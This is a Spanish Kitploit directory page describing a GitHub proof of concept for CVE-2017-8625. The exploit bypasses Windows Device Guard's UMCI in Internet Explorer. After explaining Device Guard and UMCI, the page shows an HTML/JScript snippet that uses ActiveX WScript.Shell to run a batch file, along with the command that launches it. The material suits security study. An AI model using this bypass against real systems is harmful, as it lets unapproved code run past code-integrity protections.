Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2017-8625_Bypass_UMCI — Exploit de prueba de concepto que demuestra la evasión de UMCI en Internet Explorer mediante JScript y ActiveX para ejecutar binarios arbitrarios, dirigido a las políticas de integridad de código de Windows Device Guard. | Kitploit
Herramientas/GitHubGitHub/homjxi0e/cve-2017-8625_bypass_umci
Escalada de PrivilegiosAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónDesarrollo de Payloads
GitHubhomjxi0e/cve-2017-8625_bypass_umci

CVE-2017-8625_Bypass_UMCI

Exploit de prueba de concepto que demuestra la evasión de UMCI en Internet Explorer mediante JScript y ActiveX para ejecutar binarios arbitrarios, dirigido a las políticas de integridad de código de Windows Device Guard.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
114hace 9 añosAún no revisado

Qué es ! Windows Defender Device Guard !


Windows Defender Device Guard es una combinación de funciones de seguridad de hardware y software relacionadas con la empresa que, cuando se configuran juntas, bloquean un dispositivo para que solo pueda ejecutar aplicaciones confiables que defina en sus políticas de integridad de código. Si la aplicación no es confiable, no puede ejecutarse, punto. Con hardware que cumple los requisitos básicos, esto también significa que incluso si un atacante logra obtener el control del kernel de Windows, será mucho menos probable que pueda ejecutar código malicioso. Con el hardware adecuado, Windows Defender Device Guard puede usar la nueva seguridad basada en virtualización de Windows 10 (disponible en las SKU de escritorio Enterprise y Education y en todas las SKU de Server) para aislar el servicio de integridad de código del propio kernel de Microsoft Windows. En este caso, el servicio de integridad de código se ejecuta junto al kernel en un contenedor protegido por el hipervisor de Windows. Esta guía explora las características individuales de Windows Defender Device Guard, así como cómo planificarlas, configurarlas e implementarlas. Incluye:

Qué es UMCI

UMCI impide que se ejecuten binarios no aprobados, restringe el Windows Scripting Host y coloca a PowerShell en el modo Constrained Language. Esto hace que obtener la ejecución de código en un sistema sea bastante difícil. Esta publicación va a

======================================================================||>

bypass UMCI en Enternet Explorer mediante Jscript !

Vamos a ver una demostración de bypass de código

======================================================================||>

root@kitploit:~
<html>
  <body>
    <script type="text/jscript">
      var r = new ActiveXObject("WScript.Shell").Run("empire.bat");
    </script>
   </body>
</html>

======================================================================||>

root@kitploit:~
PS:>  C:\Users\Homjxie> cmd /C "C:\Program Files\Internet Explorer\iexplore.exe " "C:\Users\Homjxie\Desktop\Homjxie.html"

Modificar código Jscript !

screenshot from 2017-08-25 11-55-12 ======================================================================||>

Siguiente ejecución del bypass

screenshot from 2017-08-25 11-56-01

======================================================================||> ======================================================================||>

Explicación del autor

@Matt Homjxi0e

Autor del bypass

@enigma0x3

Descargar herramienta